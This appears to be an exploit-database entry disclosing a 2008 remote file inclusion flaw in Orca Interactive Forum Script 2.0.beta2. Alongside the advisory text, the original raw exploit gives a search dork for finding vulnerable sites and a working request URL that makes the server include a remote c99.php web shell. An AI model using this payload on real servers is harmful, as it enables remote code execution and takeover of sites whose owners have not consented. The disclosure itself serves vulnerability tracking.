Orca - Interactive Forum Script Remote File Inclusion Vulnerability

vendor:

Orca Interactive Forum Script

by:

Ciph3r

8.8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Orca Interactive Forum Script

Affected Version From: 2.0.beta2

Affected Version To: 2.0.beta2

Patch Exists: NO

Related CWE: N/A

CPE: a:orca_interactive:orca_interactive_forum_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Orca – Interactive Forum Script Remote File Inclusion Vulnerability

Orca Interactive Forum Script is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be kept up-to-date with the latest security patches.

Source

Exploit-DB raw data:

#####################################################################
#
# Orca - Interactive Forum Script Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
#
# sp TANX2: milw0rm.com & google.com & sourceforge.net
# 
# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624    
#
# class : remote
#
# risk : high
#
# Dork : "Powered by Orca Interactive Forum Script"
#
#######################################################################
#
# C0de : 
#
#               
#    require_once ($gConf['dir']['layouts'] . 'base/params.php');
#
#
#######################################################################

 EXPLOIT :

 

 http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php?


#######################################################################

# milw0rm.com [2008-06-26]